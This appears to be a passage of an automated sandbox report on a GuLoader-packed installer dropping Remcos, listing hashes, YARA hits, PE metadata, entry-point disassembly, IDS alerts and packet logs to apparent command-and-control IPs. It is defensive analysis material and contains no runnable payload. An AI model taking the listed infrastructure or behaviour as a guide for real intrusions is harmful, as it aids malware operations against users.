                                                                                                                                                                                                                                    Entropy (8bit):5.76781505116372
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:MPtkumJX7zBE2kGwfy9S9VkPsFQ1Mx1c:97O2k5q9wA1Mxa
                                                                                                                                                                                                                                    MD5:55A26D7800446F1373056064C64C3CE8
                                                                                                                                                                                                                                    SHA1:80256857E9A0A9C8897923B717F3435295A76002
                                                                                                                                                                                                                                    SHA-256:904FD5481D72F4E03B01A455F848DEDD095D0FB17E33608E0D849F5196FB6FF8
                                                                                                                                                                                                                                    SHA-512:04B8AB7A85C26F188C0A06F524488D6F2AC2884BF107C860C82E94AE12C3859F825133D78338FD2B594DFC48F7DC9888AE76FEE786C6252A5C77C88755128A5B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: asXlZG3aW6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: aMfizaMilo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: 1ppvR5VRT6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Ozb8aojWew.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):804513
                                                                                                                                                                                                                                    Entropy (8bit):4.681017650811177
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:WNc3viuD8H89H0cDecJ4RWUEhws7xCV3:WNcR8c9H0cCi4wZxc
                                                                                                                                                                                                                                    MD5:E92E312AA45B6F4DC479CCF07A3C0730
                                                                                                                                                                                                                                    SHA1:C353EFB4D39E6D86D0D0C37AC404CE88B1171E56
                                                                                                                                                                                                                                    SHA-256:CD0E3A223A1B369439FA863A0F560C727EFFDF2F49AF5CB15B8C010E3820A0FA
                                                                                                                                                                                                                                    SHA-512:236A946483347E735CBF1CF7008C40AD8D60009EA52D6644F7A3A8D8019C0A422CC3ED186948EB1FCD44D111982E69DF8B1823863E2D9B43AEBCDC9445FC1024
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsm9317.tmp, Author: Joe Security
                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                    Entropy (8bit):7.960664613935639
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5:d82fc35769adac8d6c49087219b1cd93
                                                                                                                                                                                                                                    SHA1:ff87686b1f399b3d68a580dc016e2c675b61d5c1
                                                                                                                                                                                                                                    SHA256:8da8762a0f3794de100bd1800856136928880e8a9d0be42eb758809bca1bd0e3
                                                                                                                                                                                                                                    SHA512:6df0e845cd1d85403ee6daf2b1c2b77aaa10729fa3fd650c2feaac1ab4e5710ac8a64ee86f91e531b91640badd3197a69e07cd35352b49b410b9c6cdbef90724
                                                                                                                                                                                                                                    SSDEEP:12288:cAi7YTKWB5q86Q50v5Qo1qksWrt1rBHSKJrxODw:cApmWJ6Q50vD1jB7hxIw
                                                                                                                                                                                                                                    TLSH:F79423827A80C4BBDF6586341DBBDE3663F07623110A190BA3E45BADB613CC6724B597
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...s..Y.................b.........
                                                                                                                                                                                                                                    Icon Hash:3d2e0f95332b3399
                                                                                                                                                                                                                                    Entrypoint:0x40330d
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x597FCC73 [Tue Aug 1 00:33:55 2017 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:57e98d9a5a72c8d7ad8fb7a6a58b3daf
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    sub esp, 00000184h
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                    mov dword ptr [esp+18h], ebx
                                                                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A130h
                                                                                                                                                                                                                                    mov dword ptr [esp+20h], ebx
                                                                                                                                                                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                                                                                    call dword ptr [004080A8h]
                                                                                                                                                                                                                                    call dword ptr [004080A4h]
                                                                                                                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                                                                                                    mov dword ptr [0042472Ch], eax
                                                                                                                                                                                                                                    je 00007FAAB0980BA3h
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    call 00007FAAB0983C72h
                                                                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                                                                    je 00007FAAB0980B99h
                                                                                                                                                                                                                                    push 00000C00h
                                                                                                                                                                                                                                    call eax
                                                                                                                                                                                                                                    mov esi, 00408298h
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    call 00007FAAB0983BEEh
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    call dword ptr [004080A0h]
                                                                                                                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                                    cmp byte ptr [esi], bl
                                                                                                                                                                                                                                    jne 00007FAAB0980B7Dh
                                                                                                                                                                                                                                    push 0000000Ah
                                                                                                                                                                                                                                    call 00007FAAB0983C46h
                                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                                    call 00007FAAB0983C3Fh
                                                                                                                                                                                                                                    push 00000006h
                                                                                                                                                                                                                                    mov dword ptr [00424724h], eax
                                                                                                                                                                                                                                    call 00007FAAB0983C33h
                                                                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                                                                    je 00007FAAB0980BA1h
                                                                                                                                                                                                                                    push 0000001Eh
                                                                                                                                                                                                                                    call eax
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007FAAB0980B99h
                                                                                                                                                                                                                                    or byte ptr [0042472Fh], 00000040h
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    call dword ptr [00408288h]
                                                                                                                                                                                                                                    mov dword ptr [004247F8h], eax
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                    push 00000160h
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push 0041FCF0h
                                                                                                                                                                                                                                    call dword ptr [00408178h]
                                                                                                                                                                                                                                    push 0040A1ECh
                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8428 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x35000 | 0xa50 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x603c | 0x6200 | 029c8031e2fb36630bb7ccb6d1d379b5 | False | 0.6572464923469388 | data | 6.39361655287636 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1248 | 0x1400 | 421f9404c16c75fa4bc7d37da19b3076 | False | 0.4287109375 | data | 5.044261339836676 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1a838 | 0x400 | c93d53142ea782e156ddc6acebdf883d | False | 0.6455078125 | data | 5.223134318413766 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x35000 | 0xa50 | 0xc00 | 1b99c5df5aaedc5b60aeacee8a24a0fe | False | 0.40234375 | data | 4.186971853013905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x35190 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894
RT_DIALOG | 0x35478 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x35578 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x35698 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x356f8 | 0x14 | data | English | United States | 1.2
RT_MANIFEST | 0x35710 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetCurrentDirectoryA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T17:13:13.491271+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49747 | 109.99.162.14 | 443 | TCP
2025-01-08T17:13:17.032953+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49748 | 43.226.229.1963981 | TCP
2025-01-08T17:13:19.851927+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.11.20 | 49750 | 178.237.33.50 | 80 | TCP
2025-01-08T17:13:20.438465+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49749 | 43.226.229.1963981 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.267606974 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.267606974 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.267652988 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.268115044 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.268240929 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.268290043 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.268290043 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.268387079 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.268802881 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.269057989 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.517020941 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.517025948 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.517218113 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.517218113 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.517659903 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.517823935 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.517868042 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.517868042 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.518404007 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.518604994 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.518604994 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.518655062 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.518996000 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.519160986 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.519160986 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.519211054 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.519834042 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.520055056 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.520531893 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.520704985 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.520704985 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.521219969 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.521421909 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.521421909 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.522046089 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.522269011 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.522748947 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.522931099 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.522931099 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.523487091 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.523658991 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.523708105 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.523708105 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.524143934 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.524308920 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.524359941 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.524962902 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.525137901 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.525137901 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.525682926 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.525852919 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.525902033 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.526374102 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.526542902 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.526542902 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.526595116 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.527184963 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.527350903 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.527350903 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.527370930 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.527420998 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.527519941 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.527889013 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528011084 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528011084 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528059006 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528109074 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528109074 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528109074 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528589010 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528726101 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528726101 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528774023 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528774023 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528822899 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.528872013 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.529289961 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.529416084 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.529416084 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.529463053 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.529515982 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.529515982 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.529515982 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.530111074 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.530364037 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.530826092 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.531007051 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.531007051 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.531039953 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.531543970 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.531790018 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.532331944 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.532532930 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.532532930 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695833921 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695833921 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695931911 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696008921 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696052074 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696110964 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696178913 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696330070 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696351051 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696383953 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696553946 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696619987 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696687937 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696731091 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696846962 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696866035 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696955919 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697031975 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697068930 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697189093 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697338104 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697356939 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697423935 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697571039 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697590113 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697869062 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.242827892 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.242928982 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243053913 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243093014 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243160963 CET39814974943.226.229.196192.168.11.20
